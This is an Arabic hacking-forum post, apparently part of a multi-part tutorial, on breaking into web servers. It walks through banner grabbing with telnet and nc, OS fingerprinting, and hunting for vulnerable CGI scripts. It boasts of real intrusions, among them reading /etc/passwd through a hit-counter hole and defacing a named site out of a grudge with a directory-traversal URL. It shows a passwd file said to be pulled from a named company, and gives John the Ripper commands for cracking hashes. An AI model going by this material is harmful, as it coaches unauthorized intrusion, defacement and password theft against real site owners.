يتم تنفيذ الأمر التالي في Windows و Linux و SunOS و FreeBSD وQNX بنفس الصيغه ، ولكن أفضل Linux عنها ، وهو لأن لينكس يوفر كل ماتحتاجه من أدوات ...هذا المستند لا يختص بـ Linux لذلك لن أذكرها ، تأتي نتيجه الإتصال بسيرفر الحلم على بورت التلنت

----------------------
SunOS 5.7

: login ----------------------

يتضح بأن السيرفر يعمل على نظام SunOS 5.7 ،بقي عليك أن تنتزع التواقيع من البورتات المتبقيه لتعرف ما هو التطبيق وإصدارته المنصت لها (إستخدم التلنت ) ، وثم تقوم ببحث عن نقاط ضعف لها وتحصل على شيفرات الإستثمار الخاصه بها ، الخطوه التاليه هي أن تعرف ما هو ملقم الويب الذي يعمل على هذا النظام ، نذهب الى الترمينال تبع ليونكس ونكتب

nc http://www.7lem.com/ 80

----------------------
.
.
.
Apache/1.3.* Server
.
.
----------------------

أختصرت النتيجه وتم تضليل إصدار ملقم الويب وذلك لحمايه الموقع ، اتمنى أن تستطيع كشفه بنفسك...
من المعروف من عمليه السكان بورت بأن البورتين 110 و 25 مفتوحين ، هذا يدل على أن في الموقع خدمة البريد الإلكتروني ، بالطبع هذا يفيدك لمعرفه smtp و pop للموقع ، كل ماعليك فعله هو كتابه الأمر التالي (في Linux )

host 7lem.com

وأنتظر النتائج

ملاحظه :- إذا كنت تعيش مع بن لادن ولست عائش في جو تقنيه معلومات كل ما عليك فعله هو تفجيرالإيميل (على حسب ما يسمياها كثير من الناس)
ملاحظه ثانيه :- إذا لم تجد في السيرفر خدمه تلنت أو أنه تم تغيير التوقيع عن طريق مثلا قرصنه النظام ....الخ ، عليك أن تستخدم queso الأداة المفضله لكشف نظام التشغيل ، وهي تعمل على ليونكس ، لإستخدامها عليك كتابه
queso http://www.7elm.com/

كل ماعليك بعد تثبيت الأداة في جهازك هو كتابه queso وثم مسافه والموقع ورقم البورت 80 والذي هو بطبيعه الحال مفتوح في جميع المواقع...يأتيك الرد بأن النظام SunOS 5.7

لو أردت مثلا قائمة بالبريدات الموجوده في موقع http://www.condor.com/ مثلا ( support أو webmaster أو info ...الخ ) أو أدرت معرفه الـ DNS الأولي والثانوي للموقع ، أو من هو الشخص اللي سجل ومعلومات عنه وما هي الشركه التي تستظيف الموقع ، عليك بإستخدام خدمه whois ، تستطيع إستخدام خدمه whois وتطلب معلومات من قواعد بيانات whois عن طريق أمر whois في لينكس ، أكتب man whois لمزيد من المعلومات ، إذا كنت تستخدم ويندوز أو أي بيئه أخرى أنصحك بالتوجه الى برمجيات السي جي آي المتواجد في الموقع
http://www.psyon.org/tools/index.html
توفر لك هذه الصفحه مجموعه من برمجيات السي جي آي التي تسهل لك المهمه ، هناك رياضيات لطلب معلومات عن موقع ويب بإستخدام whois وهي مفيده جدا ، على كل حال توجه الى الموقع التالي لمزيد من التفاصيل
http://www.google.com/search?q=whois&btnG=Google+Search










- كيف يتم كشف نقاط الضعف ؟
~~~~~~~~~~~~~~~~~~~~~~~~~~
لا تستخدم برامج مثل void eye أو ShadowSecurityScaner هذه للمغفلين فقط!!، المحترفين واللي يبغا يكون محترف لا يستخدم برامج في عمليات الإختراق ، ولا يخترق لمجرد أنه يبغا يخترق ، عمليه إختراق سيرفر تمتاز بالدقه المتناهيه ، والتخطيط المحكم ، وكل عمليات السطو المحكمه هي التي يصعب إكتشاف مرتكبيها ، لكن والله لو كنت من اللي يشغل برنامج ومايدري الله وين حاطه فصدقني إنك ماراح تفلح طول عمرك ، هذا لو قدرت تخترق شئ ، فلو حدث وتم الإختراق بواحد من هذه البرامج فسوف تصطاد بسناره تماما كالسمكه
نقاط الضعف المفضله والتي تعتبر كأسرار ولا يكشف عنها الا بعد فتره طويله هي التي في ملقم الويب مثل Apache أو IIS ، وكذلك نقاط الضعف الموجوده في سكربتات CGI و Perl و PHP ، أو التي قد تكون موجوده في البرنامج المستخدم لتفسير نصوص البيرل أو السي جي آي ، وإذا كان في الموقع برنامج لتسوق مثلا من الممكن أن تستغل فيه نقطه ضعف هذا إذا وجدت به ، يعني اي شئ في السيرفر سوى كان سكربت بيرل أو سي جي آي..أو كان برنامج تنفيدي أو حتى نظام التشغيل أو ملقم الويب مصاب بنقطه ضعف من الممكن أن يعرض السيرفر للإختراق ويعرض كل ما بداخله من أسرار الى المخترق ، سأختار لكم حادثه مره معي
، عداد زورا
counter عرض موقع
mp3 مشهور للإختراق في أي لحظه ، أول مادخلت الموقع ونزلت أغنيه Don't Tell Me في الوقت اللي كانت الاغنيه تنزل فيه حبيت أشوف الموقع وأضيع وقت الى أن ينتهي التحميل ، ما كنت أتوقع أني بلاقي نقاط ضعف فيه ، فتحت التلنت
وشبكت على كم بورت معروف مثل 25 و 23 و 21 و110 الخ ، دخلت منتدى في الموقع واخذت إسم المنتدى Ikonboard v2.1.8b توجهة الى كم موقع وبحثت فيها بسرعه عن نقاط ضعف المنتدى ، ولكن كانت نقاط الضعف لـ Ikonboard v2.1.8b وليس Ikonboard v2.1.7b ، تركنا المنتدى ورحنا ندور على شئ ثاني ، فتحت السورس تبع الصفحه وبحثت عن cgi و pl ، وجدنا سكريبت ثاني ، علبة توصيت ، نبحث عن نقاط ضعف لها ، لا شئ تماما ، نكمل البحث عن السكريبتات ، وأخيرا وعندما وصل التحميل للأغنيه عند 80 % كنت قد توصلت لنقطه ضعف في سكريبت cgi خاص لعداد الزوار ، تمكنك من عرض أي ملف في السيرفر ، طلبت الملف etc/passwd وطبعا كلمة المرور المسجله في المف كانت مضلله والنظام كان هو FreeBSD يعني كلمة المرور تكون في نفس الدليل ولكن في ملف ثاني وهوالملف shadow أوmaster.passwd ، لاتشغل بالك الآن بما تعنيه كلمة مضلله ومافائده هذا الملف ..كل هذا ستعرفه قريبا ...إستمر في القراءة فقط
++++++++++++++++++++++++
الجزء الثاني
{ http://www.fbunet.de/cgibin/nph-%20%20%20%20%20.cgi } هذا CGI ، لا تستغرب ، هذه هي الحركات الجديده لنشر ال نكمل الموضوع ....

ما قلت هذا موقع يهودي والله بدمره وصلح عليهم عنتر ولد بو شداد ، أرسلت رساله لنقطه الضعف ، صلحت لها نسخ ولصق ، ورد علي بالشكر وقائمه بالأغاني الجديده لديهم وأخذ فكره حسنه عن المسلمين وعن العرب بدل من فكره الإرهاب اللي حكوماتهم تزرعها في عقولهم

لنأخذ مثال : الموقع timduff.com هذا موقع يستحق التدمير ، وقد تم ذلك ، وهو الآن تم إرجاعه ولكن من جديد ولا يحوي الا القليل من الصفحات لا تتجاوز إثنتان

سمعت عن هذا الموقع في أحد منتديات الهاكرز الإنجليزيه بأنه يقدم خدمه لا أعلم ما هي بالضبط ، فذهبت للموقع لأسجل واعرف ماهي ، كان التسجيل عن طريق إرسال معلومات الى بريد الإلكتروني ارسلت معلومات ، وصلني الرد بعد ساعتين تقريبا ، كا كنت أن الرد يكون كله حش وسب ، ما كنت أقراء الا كلام كله حش وسب ، ليش ، تبين لي السبب هو ذكري كلمة i'm from saudi arabia ، ولكن لماذا كل هذا الحقد ، ومضت ايام وكل يوم والثاني أحقد عليه أكثر وأكثر عشان عنصريته ، الا أن توفقنا ولقينا لملقم الويب حقه نقطه ضعف في موقعي روسي ، والا الآن غير مرقوعه ، تقدر تعرض كل الملفات الموجوده في السيرفر ، وتقدر تسحب منها كل ماتريد ، عن طريق اليو آر إل هذا

عنوان الموقع وثم /../../../../../../../../../../../../../../../../../ أو حتى من الممكن أن تضع بعد عنوان الموقع /../ فقط ، هل عرفت ما تعرض لك هذه الاخيره !


الآن سوف أضع النقاط الأساسيه لكشف نقاط ضعف على موقع ما :-

1- التعرف على كافه الخدمات الموجوده على السيرفر
2- معرفه نظام التشغيل وإصدارته وكذلك ملقم الويب وأي برمجيات أخرى مثل مفسر نصوص بيرل إذا كان ذلك ممكن ، أو برنامج للبيع والشراء .....الخ
3- عمل جلسه لإلتقاط كل السكربتات ( Perl - Cgi ) الموجوده في الموقع ، هذا إذا وجد شئ منها
4- ولاتنسى تحط البورتات معها ، لأنه أحيانا يكون في البورت نقطه ضعف ، ليس هذا صحيحا 100% نقطه الضعف ليست في البورت بعينه ، في البرنامج اللي مصلح إنصات للبورت (هذا أقرب تعبير لها)
5- أخيرا يمكنك الإستفاده من المعلومات التي حصلت عليها في البحث عن نقاط ضعف (يوجد في آخر هذا المستند مواقع من ظمنها مواقع تحتوي على أرشيفات قد تفيدك في الحصول على الثغرات)










- كيف يمكن إستغلال نقاط الضعف المكتشفه ؟
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
أبسط الثغرات والتي يستطيع أي مبتدي أن يستخدمها هي تلك التي تنفذ من خلال المتصفح ، مثل المثال السابق ذكره لإختراق الموقع http://www.timduff.com/


نوع آخر ، يكون الإستثمار (من الآن سوف نطلق إسم إستثمار على الطريقه التي تستغل بها الثغره) يكون الإستثمار على شكل شفره (كود) مكتوب ببرنامج sh في ليونكس ، وهو ما يسمى بالعربي برنامج الغلاف وبالإنجليزي shell وتكون هذه الشفره تحت ملف بالإمتداد *.sh وتعمل تحت بيئه ليونكس ، وهذا النوع من الإستثمارات هو المفضل ويحسس المخترق بالقوه ونظرا لتعدد الأداوت في ليونكس فإن لغه shell اصبحت قويه فهي تقابل كتابه ملف دفعاتي في ويندوز (bat)


ويوجد نوع من الإستثمارات ثاني وهو شفره (كود) مكتوب بلغه C المشهوره ، وهذا النوع غالبا ما تحدث فيه أخطأ أثناء عمليه الترجمه ، قد تواجه كثير من المتاعب لذلك يجب أن تكون لديك خلفيه في لغه سي ، ولترجمه هذا النوع عليك بالذهاب الى ليونكس وترجمته بإستخدام المترجم gcc
gcc Exploit.c -o Exploit
ملاحظه مهمه ( يجب أن يكون الإمتداد للمف *.c وليس *.C ، لو كان حرف c كبتل فسوف يترجم الإستثمار وكأنه كتب في سي ++ ، الشئ الثاني تأكد من توفر المكتبات (*.h) التي يتطلبها الإستثمار قبل تشغيله)
عليك زياره موقعي فهناك مستندات في البرمجه قد تنفعك


يوجد نوع ظهر مؤخرا من الإستثمارات وبداء ينتشر وهو أيضا شفره ولكن مكتوبه بلغه Perl ومن الممكن أن يتم تشغيل هذا النوع من موجه الدوس في ويندوز (يجب أن تملك برنامج يفسر شفرات البيرل مثل أكتيف بيرل)


وأحيرا انواع نادره من الإستثمارات قد تكون على شكل خطوات ....


Exploit = إستثمار










- ماهو ملف كلمة المرور password file ؟
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ملف كلمة المرور معروف من إسمه ، هو الذي في داخله توجد حسابات الأشخاص المرخص لهم بالدخول الى السيرفر ، مثل هذا

------------------------------------------------------------------------------------------------
root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp Admin:/usr/lib/uucp: nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network Admin:/usr/net/nls: nobody:x:60001:60001:Nobody:/: noaccess:x:60002:60002:No Access User:/: nobody4:x:65534:65534:SunOS 4.x Nobody:/: www:x:102:1001::/web:/bin/csh mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu sid:x:103:10::/export/home/sid:/bin/ksh mirror:x:104:1::/home/mirror:/bin/sh admin:x:105:1::/home/admin:/bin/sh jerome:x:106:1::/home/jerome:/bin/sh erl:x:102:1::/home/erl:/bin/sh landmark:x:1000:1000::/web/landmark:/bin/ksh
------------------------------------------------------------------------------------------------
وقد تكون أكثر بكثير ، حيث أن هذا الملف الموضح بالأعلى أختصر بشكل كبير ، فعند سحبه كان يحتوي على آلالاف السطور ، ليس كل ملفات كلمات المرور بهذا الحجم فيوجد منها من لا يتجاوز 10 أسطر وهي الموجوده بكثره ، على العموم أنت الحين عليك تعرف بأن ملف كلمة المرور هو الذي في داخله توجد حسابات الأشخاص المرخص لهم بالدخول الى السيرفر ......










- بماذا يفيدني هذا الملف ؟
~~~~~~~~~~~~~~~~~~~~~~~~~~
يفيدك يا الحبيب في معرفه كلمات السر وإسماء المستخدمين لكي تقوم بإختراق الموقع ، ولكن لاتفرح ...! كلمة المرور تكون مشفره ، لا هذا ليس صحيحا تماما ، كانت مشفره زمان ولكن في الوقت الحالي هي مضلله

*او x = كلمة سر مضلله Shadowed

EpGw4GekZ1B9U = كلمة سر مشفره على مقياس DES ، هذا النوع من التشفير المستخدم في ليونكس و FreeBSD وعدد من الأنظمه الأخرى ضعيف ، وهو دائما مكون من 13 حرف ورقم كبتل وسمول ولا يحتوي من بينها على رمز ابداً ، بإستثناء ويندوز فهو يستخدم نوع آخر من التشفير وهو نوع ضعيف أيضا










- كيف يمكن معرفة كلمة السر من خلال ملف الباسورد password file ؟
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

~~~~~~~~~~~~
إضغط Ctrl + Shift في القسم الأيمن من لوحه المفاتيح لتقراء من اليسار الى اليمين ، ثم إذهب الى الاعلى حيث وضعت مثال لملف كلمة مرور تم سحبه من الموقع hwwilson.com ...
تفسير هذا السطر :-
root:x:0:1:Super-User:/:/sbin/sh

root
هذا السطر يوضخ المستخدم واللي هو الجذر root
x
وكلمة المرور ، ويتضح انها مضلله ، يعني مكانها العلامة x ، لا تفكر في كسرها فهذا مستحيل ، لكن عليك البحث عن ملف ثاني تم تخزين فيه كلمة المرور ، ستعرف بعد قليل كيف تفعل هذا


0
هذا هو رقم المستخدم


1
رقم المجموعه


Super-User:/:/sbin/sh
هذا مش مهم
++++++++++++++++++++++++++++
الجزء الثالث
- ماالفرق بين إذا كان الملف (مشفر encryption) وإذا كان (مضلل shadowed) ؟
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

~~~~~~~~~~~~~~~~~~~~~~
الملف المضلل shadow file يكون مكان كلمة المرور رمز مثل * أو x أو # أو ! وهذا مثال لها
root:x:0:1:Super-User:/:/sbin/sh

لكن الملف المشفر تكون كلمة المرور مكتوبه ولكن مشفره مثل هذه
root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh
هنا تكون كلمة المرور المشفره هي Q71KBZlvYSnVw

الآن طلعت الصوره صافيه ....










- وماذا لو كان ملف كلمة المرور مشفر ، كيف يتم كسره ؟
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

~~
البرامج كثيره وأشهرها هو Crack 5.0a و john the ripper ويوجد آخر بإسم jack the ripper ، إذا كنت ممن يجيدون العمل في ليونكس فهذا جيد ، عليك تنزيل Crack 5a ، وأفضل john the ripper لمن يريد إستخدام ويندوز ، وللمعولميه فإن john the ripper عمل أيضا تحت ليونكس .....

طريقه عمل هذه البرامج :-
يقدم للبرنامج wordlist ويقوم بمطابقه الكلمات الموجوده به ، كما هو موضح هنا .

------------------------------------------------------------------------------------------------ \ Q2wrtUo9LPq2R <------
يتم مقارنه | // <--- {البدايه} كلمة المرور | /---/ المشفره مع | / 1 / أخذ كلمة من الـ wordlist الكلمات | / 0 / _____________ المختاره حتى | {تشفير}/ 1 / | | يتم --------^--------- / 0 / \----| word list | التطابق Q6LiJ6ct1oUBz <-كلمة مرور مشفره /---/ الكلمة المختاره | |_____________| ------------------ //--------song------ \ إذا حدث تطابق فهذا يعني أن
كلمة المرور التي كانت مشفره
قد كسرت ..
| ------------------------------------------------------------------------------- | ملاحظه مهمه :- يتم عمل دوره مثل الموضحه في الأعلى لكسر كلمات المرور المشفره بسرعه
{النهايه} | 5000 تجربه في الثانيه (إختبرناjohn the ripperعلى معالج بسرعه 700)
| -------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------
هذه الرسمه تعبت عليها عشان كذا لا أحد يسرقها

لتشغيل john the ripper من واجه دوس نكتب الأمر التالي

john -w:wordlist passwd
حيث wordlist هو ملف القاموس الذي يحتوي على عدد كبير من الكلمات
و passwd هو الملف الذي يحتوي على كلمات المرور المشفره والتي نود معرفتها

------------------------------------------------------------------------------------------------
Microsoft(R) Windows 98
C)Copyright Microsoft Corp 1981-1998.(

E:\Desktop\junk\john the ripper>john -w asswd passwd.txt

by Sola 97,John the Ripper Version 1.3 Copyright (c) 1996

Loaded 1 password

**v: 0 c: 6401 t: 0:00:00:01 99% c/s: 6401 w: *****DONE

>E:\Desktop\junk\john the ripper
------------------------------------------------------------------------------------------------

وسوف تحفظ النتيجه في الملف john.pot الموجود في نفس الدايروكتري ، وعليك حذف هذا الملف إذا أردت البدء في عمليه كسر جديده ويمكنك تغيير إسمه أو نقله في مكان آخر بدل من حذفه إذا كنت ترى ذلك ...

هناك طريقه اخرى للكسر وهي تسمى بـ brute force أو بالعربي القوه العنيفه ، وهي لا تحتاج لملف wordlist ، هي تقوم بتجربه كل الحروف والأرقام والرموز مع بعض في خانتان و3خانات واربع وخمس ..الخ حتى تصيب كلمة المرور الصحيحه ، وأنا افضل ان تستخدم ملفات wordlist فذلك لن يأخذ معك في الا ثواني فقط لأن عمليه التجربه الموضحه في الرسم بالأعلى ذكرت بأنه سرعة تجربه الكلمات يتجاوز 5000 كلمة في الثانيه ، إذا لم تفلح ملفات wordlist حينها إذهب الى القوه العنيفه brute force
الأمر التالي يجعل john the ripper يستخدم طريقه brute force السابق ذكرها

john -i passwd

حيث passwd هو ملف كلمة المرور المراد كسره ، إذا قمت بتجربه هذه الطريقه إضغط إنتر أثناء عمل البرنامج لترى الى أين توصل ...
__________________
[align=center][glint]لا إله إلا الله محمداً رسول الله[/glint]
[caution]لا إله إلا الله محمداً رسول الله
سبحان الله و بحمده ... سبحان الله العظيم
اللهم قني عذاب جهنم و عذاب القبر و فتنة المحيى و الممات و شر فتنة المسيح الدجال ... آمين [/caution]
[/align]
[align=center][BIMG]http://img403.imageshack.us/img403/2711/75415822sj7.gif[/BIMG][/align]
[align=center][BIMG]http://img403.imageshack.us/img403/2711/75415822sj7.gif[/BIMG][/align]

[email protected]
Syrian Hacker غير متصل  
موضوع مغلق

مواقع النشر (المفضلة)

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 03:12


Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2014, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.